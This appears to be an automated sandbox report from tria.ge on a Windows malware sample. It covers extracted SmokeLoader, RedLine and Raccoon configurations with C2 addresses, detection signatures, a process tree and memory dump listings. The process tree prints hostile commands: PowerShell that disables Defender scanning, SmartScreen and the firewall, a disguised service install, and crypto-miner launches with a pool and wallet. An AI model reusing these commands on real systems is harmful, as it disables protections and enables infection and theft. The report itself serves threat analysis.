Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    45s
  • max time network
    131s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    26/09/2021, 23:36

General

  • Target

    28351e9cfaca470a9f99b2455b3f1354.exe

  • Size

    134KB

  • MD5

    28351e9cfaca470a9f99b2455b3f1354

  • SHA1

    3546e2d0d5732538a0bb565d410f5ca1de9c3416

  • SHA256

    11b4633345982ace9d710465450941598b2f9289f0438c358fa79eb8eaf680c3

  • SHA512

    2314aa8caf12dd0a730106b3fd6663bf80f8cc798956aef55eeb238d640b11f7a4afafb8f87293df7b6ece96afd4dc9002dfeacb6ecdca5a2296ada2826f4897

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://naghenrietti1.top/

http://kimballiett2.top/

http://xadriettany3.top/

http://jebeccallis4.top/

http://nityanneron5.top/

http://umayaniela6.top/

http://lynettaram7.top/

http://sadineyalas8.top/

http://geenaldencia9.top/

http://aradysiusep10.top/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

Denis

C2

45.147.197.123:31820

Extracted

Family

raccoon

Botnet

5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4

Attributes
  • url4cnc

    https://t.me/agrybirdsgamerept

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

Bliss

C2

185.237.98.178:62607

Extracted

Family

redline

Botnet

karma

C2

94.103.9.133:39323

Signatures

  • Generic Chinese Botnet

    A botnet originating from China which is currently unnamed publicly.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

  • Chinese Botnet Payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\28351e9cfaca470a9f99b2455b3f1354.exe
    "C:\Users\Admin\AppData\Local\Temp\28351e9cfaca470a9f99b2455b3f1354.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1044
    • C:\Users\Admin\AppData\Local\Temp\28351e9cfaca470a9f99b2455b3f1354.exe
      "C:\Users\Admin\AppData\Local\Temp\28351e9cfaca470a9f99b2455b3f1354.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2028
  • C:\Users\Admin\AppData\Local\Temp\23C5.exe
    C:\Users\Admin\AppData\Local\Temp\23C5.exe
    1⤵
    • Executes dropped EXE
    PID:1496
    • C:\Users\Admin\AppData\Local\Temp\SindonsWelfare_2021-09-26_15-02.exe
      "C:\Users\Admin\AppData\Local\Temp\SindonsWelfare_2021-09-26_15-02.exe"
      2⤵
        PID:1796
      • C:\Users\Admin\AppData\Local\Temp\SolanumsYoghurt_2021-09-26_14-52.exe
        "C:\Users\Admin\AppData\Local\Temp\SolanumsYoghurt_2021-09-26_14-52.exe"
        2⤵
          PID:1584
        • C:\Users\Admin\AppData\Local\Temp\fbf.exe
          "C:\Users\Admin\AppData\Local\Temp\fbf.exe"
          2⤵
            PID:1164
        • C:\Users\Admin\AppData\Local\Temp\2980.exe
          C:\Users\Admin\AppData\Local\Temp\2980.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1232
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qqmksfsk\
            2⤵
              PID:1464
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\frysxdqy.exe" C:\Windows\SysWOW64\qqmksfsk\
              2⤵
                PID:1176
              • C:\Windows\SysWOW64\sc.exe
                "C:\Windows\System32\sc.exe" create qqmksfsk binPath= "C:\Windows\SysWOW64\qqmksfsk\frysxdqy.exe /d\"C:\Users\Admin\AppData\Local\Temp\2980.exe\"" type= own start= auto DisplayName= "wifi support"
                2⤵
                  PID:432
                • C:\Windows\SysWOW64\sc.exe
                  "C:\Windows\System32\sc.exe" description qqmksfsk "wifi internet conection"
                  2⤵
                    PID:1648
                  • C:\Windows\SysWOW64\sc.exe
                    "C:\Windows\System32\sc.exe" start qqmksfsk
                    2⤵
                      PID:1044
                    • C:\Windows\SysWOW64\netsh.exe
                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      2⤵
                        PID:292
                    • C:\Users\Admin\AppData\Local\Temp\2E71.exe
                      C:\Users\Admin\AppData\Local\Temp\2E71.exe
                      1⤵
                      • Executes dropped EXE
                      PID:596
                    • C:\Users\Admin\AppData\Local\Temp\348A.exe
                      C:\Users\Admin\AppData\Local\Temp\348A.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:296
                      • C:\Users\Admin\AppData\Local\Temp\filename.exe
                        "C:\Users\Admin\AppData\Local\Temp\filename.exe"
                        2⤵
                          PID:2748
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(exit)
                            3⤵
                              PID:1012
                              • C:\Windows\system32\netsh.exe
                                "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                4⤵
                                  PID:2252
                                • C:\ProgramData\UpSys.exe
                                  "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                  4⤵
                                    PID:2244
                                    • C:\ProgramData\UpSys.exe
                                      "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                      5⤵
                                        PID:1820
                                        • C:\ProgramData\UpSys.exe
                                          "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
                                          6⤵
                                            PID:292
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                              7⤵
                                                PID:2556
                                      • C:\ProgramData\Systemd\Database.exe
                                        -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
                                        3⤵
                                          PID:2272
                                        • C:\ProgramData\Systemd\Database.exe
                                          -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
                                          3⤵
                                            PID:2292
                                          • C:\ProgramData\Systemd\Database.exe
                                            -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
                                            3⤵
                                              PID:2432
                                            • C:\ProgramData\Systemd\Database.exe
                                              -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
                                              3⤵
                                                PID:1916
                                              • C:\ProgramData\Systemd\Database.exe
                                                -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
                                                3⤵
                                                  PID:2608
                                                • C:\ProgramData\Systemd\Database.exe
                                                  -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
                                                  3⤵
                                                    PID:848
                                                  • C:\ProgramData\Systemd\Database.exe
                                                    -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
                                                    3⤵
                                                      PID:2760
                                                    • C:\ProgramData\Systemd\Database.exe
                                                      -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
                                                      3⤵
                                                        PID:1304
                                                      • C:\ProgramData\Systemd\Database.exe
                                                        -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
                                                        3⤵
                                                          PID:1372
                                                    • C:\Users\Admin\AppData\Local\Temp\397A.exe
                                                      C:\Users\Admin\AppData\Local\Temp\397A.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:1104
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute facebook.com
                                                        2⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1228
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitter.com
                                                        2⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:288
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute google.com
                                                        2⤵
                                                          PID:768
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute bing.com
                                                          2⤵
                                                            PID:1224
                                                          • C:\Windows\System32\WScript.exe
                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Mcmyxcl.vbs"
                                                            2⤵
                                                              PID:2220
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\putty.exe'
                                                                3⤵
                                                                  PID:2276
                                                              • C:\Users\Admin\AppData\Local\Temp\397A.exe
                                                                C:\Users\Admin\AppData\Local\Temp\397A.exe
                                                                2⤵
                                                                  PID:2472
                                                              • C:\Windows\SysWOW64\qqmksfsk\frysxdqy.exe
                                                                C:\Windows\SysWOW64\qqmksfsk\frysxdqy.exe /d"C:\Users\Admin\AppData\Local\Temp\2980.exe"
                                                                1⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:1760
                                                                • C:\Windows\SysWOW64\svchost.exe
                                                                  svchost.exe
                                                                  2⤵
                                                                    PID:784
                                                                • C:\Program Files (x86)\Microsoft Ouigga\Uuuocai.exe
                                                                  "C:\Program Files (x86)\Microsoft Ouigga\Uuuocai.exe"
                                                                  1⤵
                                                                    PID:1768
                                                                    • C:\Program Files (x86)\Microsoft Ouigga\Uuuocai.exe
                                                                      "C:\Program Files (x86)\Microsoft Ouigga\Uuuocai.exe" Win7
                                                                      2⤵
                                                                        PID:2588
                                                                    • C:\Windows\system32\makecab.exe
                                                                      "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20210926233823.log C:\Windows\Logs\CBS\CbsPersist_20210926233823.cab
                                                                      1⤵
                                                                        PID:2484

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v6

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • memory/288-116-0x00000000027C0000-0x00000000027C2000-memory.dmp

                                                                        Filesize

                                                                        8KB

                                                                      • memory/288-118-0x00000000027C4000-0x00000000027C7000-memory.dmp

                                                                        Filesize

                                                                        12KB

                                                                      • memory/288-119-0x00000000027CB000-0x00000000027EA000-memory.dmp

                                                                        Filesize

                                                                        124KB

                                                                      • memory/288-117-0x00000000027C2000-0x00000000027C4000-memory.dmp

                                                                        Filesize

                                                                        8KB

                                                                      • memory/288-114-0x000000001B750000-0x000000001BA4F000-memory.dmp

                                                                        Filesize

                                                                        3.0MB

                                                                      • memory/288-113-0x000007FEEDCE0000-0x000007FEEE83D000-memory.dmp

                                                                        Filesize

                                                                        11.4MB

                                                                      • memory/296-75-0x0000000000F70000-0x0000000000F71000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/296-79-0x0000000004AE0000-0x0000000004AE1000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/596-92-0x0000000000290000-0x0000000000320000-memory.dmp

                                                                        Filesize

                                                                        576KB

                                                                      • memory/596-94-0x0000000000400000-0x00000000004F0000-memory.dmp

                                                                        Filesize

                                                                        960KB

                                                                      • memory/768-124-0x0000000002790000-0x0000000002792000-memory.dmp

                                                                        Filesize

                                                                        8KB

                                                                      • memory/768-122-0x000007FEEDCE0000-0x000007FEEE83D000-memory.dmp

                                                                        Filesize

                                                                        11.4MB

                                                                      • memory/768-125-0x0000000002792000-0x0000000002794000-memory.dmp

                                                                        Filesize

                                                                        8KB

                                                                      • memory/768-126-0x000000000279B000-0x00000000027BA000-memory.dmp

                                                                        Filesize

                                                                        124KB

                                                                      • memory/768-123-0x000000001B760000-0x000000001BA5F000-memory.dmp

                                                                        Filesize

                                                                        3.0MB

                                                                      • memory/768-127-0x0000000002794000-0x0000000002797000-memory.dmp

                                                                        Filesize

                                                                        12KB

                                                                      • memory/784-104-0x00000000000D0000-0x00000000000E5000-memory.dmp

                                                                        Filesize

                                                                        84KB

                                                                      • memory/1012-206-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

                                                                        Filesize

                                                                        3.0MB

                                                                      • memory/1012-203-0x000007FEEADF0000-0x000007FEEB94D000-memory.dmp

                                                                        Filesize

                                                                        11.4MB

                                                                      • memory/1044-56-0x0000000000220000-0x0000000000229000-memory.dmp

                                                                        Filesize

                                                                        36KB

                                                                      • memory/1104-87-0x00000000009A0000-0x00000000009A1000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/1104-137-0x00000000026C0000-0x0000000002756000-memory.dmp

                                                                        Filesize

                                                                        600KB

                                                                      • memory/1104-165-0x0000000002820000-0x0000000002897000-memory.dmp

                                                                        Filesize

                                                                        476KB

                                                                      • memory/1104-93-0x00000000027A0000-0x00000000027A2000-memory.dmp

                                                                        Filesize

                                                                        8KB

                                                                      • memory/1164-157-0x0000000010000000-0x0000000010018000-memory.dmp

                                                                        Filesize

                                                                        96KB

                                                                      • memory/1224-134-0x0000000002672000-0x0000000002674000-memory.dmp

                                                                        Filesize

                                                                        8KB

                                                                      • memory/1224-136-0x000000001B800000-0x000000001BAFF000-memory.dmp

                                                                        Filesize

                                                                        3.0MB

                                                                      • memory/1224-133-0x0000000002670000-0x0000000002672000-memory.dmp

                                                                        Filesize

                                                                        8KB

                                                                      • memory/1224-132-0x000007FEEDCE0000-0x000007FEEE83D000-memory.dmp

                                                                        Filesize

                                                                        11.4MB

                                                                      • memory/1224-135-0x0000000002674000-0x0000000002677000-memory.dmp

                                                                        Filesize

                                                                        12KB

                                                                      • memory/1224-138-0x000000000267B000-0x000000000269A000-memory.dmp

                                                                        Filesize

                                                                        124KB

                                                                      • memory/1228-95-0x000007FEEDCE0000-0x000007FEEE83D000-memory.dmp

                                                                        Filesize

                                                                        11.4MB

                                                                      • memory/1228-102-0x0000000002824000-0x0000000002827000-memory.dmp

                                                                        Filesize

                                                                        12KB

                                                                      • memory/1228-100-0x0000000002820000-0x0000000002822000-memory.dmp

                                                                        Filesize

                                                                        8KB

                                                                      • memory/1228-101-0x0000000002822000-0x0000000002824000-memory.dmp

                                                                        Filesize

                                                                        8KB

                                                                      • memory/1228-109-0x000000000282B000-0x000000000284A000-memory.dmp

                                                                        Filesize

                                                                        124KB

                                                                      • memory/1228-97-0x000000001B7C0000-0x000000001BABF000-memory.dmp

                                                                        Filesize

                                                                        3.0MB

                                                                      • memory/1228-91-0x000007FEFB541000-0x000007FEFB543000-memory.dmp

                                                                        Filesize

                                                                        8KB

                                                                      • memory/1232-70-0x0000000000400000-0x00000000004AD000-memory.dmp

                                                                        Filesize

                                                                        692KB

                                                                      • memory/1232-69-0x0000000000230000-0x0000000000243000-memory.dmp

                                                                        Filesize

                                                                        76KB

                                                                      • memory/1268-57-0x0000000002A70000-0x0000000002A86000-memory.dmp

                                                                        Filesize

                                                                        88KB

                                                                      • memory/1496-61-0x00000000012C0000-0x00000000012C1000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/1584-154-0x0000000004C01000-0x0000000004C02000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/1584-153-0x0000000000400000-0x00000000004CB000-memory.dmp

                                                                        Filesize

                                                                        812KB

                                                                      • memory/1584-145-0x0000000001F10000-0x0000000001F33000-memory.dmp

                                                                        Filesize

                                                                        140KB

                                                                      • memory/1584-148-0x0000000000230000-0x0000000000267000-memory.dmp

                                                                        Filesize

                                                                        220KB

                                                                      • memory/1584-146-0x0000000002110000-0x0000000002132000-memory.dmp

                                                                        Filesize

                                                                        136KB

                                                                      • memory/1760-106-0x0000000000400000-0x00000000004AD000-memory.dmp

                                                                        Filesize

                                                                        692KB

                                                                      • memory/1796-149-0x0000000001F70000-0x0000000001F8F000-memory.dmp

                                                                        Filesize

                                                                        124KB

                                                                      • memory/1796-150-0x0000000004761000-0x0000000004762000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/1796-151-0x0000000002140000-0x000000000215E000-memory.dmp

                                                                        Filesize

                                                                        120KB

                                                                      • memory/1796-152-0x0000000004762000-0x0000000004763000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                      • memory/2028-53-0x0000000000400000-0x0000000000409000-memory.dmp

                                                                        Filesize

                                                                        36KB

                                                                      • memory/2028-55-0x0000000075871000-0x0000000075873000-memory.dmp

                                                                        Filesize

                                                                        8KB

                                                                      • memory/2272-217-0x000000013FB60000-0x0000000140D48000-memory.dmp

                                                                        Filesize

                                                                        17.9MB

                                                                      • memory/2276-172-0x000000001B820000-0x000000001BB1F000-memory.dmp

                                                                        Filesize

                                                                        3.0MB

                                                                      • memory/2276-171-0x000007FEEDCE0000-0x000007FEEE83D000-memory.dmp

                                                                        Filesize

                                                                        11.4MB

                                                                      • memory/2292-220-0x000000013F960000-0x0000000140B48000-memory.dmp

                                                                        Filesize

                                                                        17.9MB

                                                                      • memory/2432-223-0x000000013F580000-0x0000000140768000-memory.dmp

                                                                        Filesize

                                                                        17.9MB

                                                                      • memory/2472-194-0x000000001B6B0000-0x000000001B6FE000-memory.dmp

                                                                        Filesize

                                                                        312KB

                                                                      • memory/2472-197-0x000000001BB60000-0x000000001BBA6000-memory.dmp

                                                                        Filesize

                                                                        280KB

                                                                      • memory/2472-196-0x000000001BB10000-0x000000001BB5F000-memory.dmp

                                                                        Filesize

                                                                        316KB

                                                                      • memory/2472-182-0x00000000023E0000-0x0000000002463000-memory.dmp

                                                                        Filesize

                                                                        524KB

                                                                      • memory/2472-195-0x0000000000580000-0x0000000000585000-memory.dmp

                                                                        Filesize

                                                                        20KB

                                                                      • memory/2472-174-0x0000000140000000-0x0000000140070000-memory.dmp

                                                                        Filesize

                                                                        448KB

                                                                      • memory/2748-190-0x000000013F6D0000-0x0000000140034000-memory.dmp

                                                                        Filesize

                                                                        9.4MB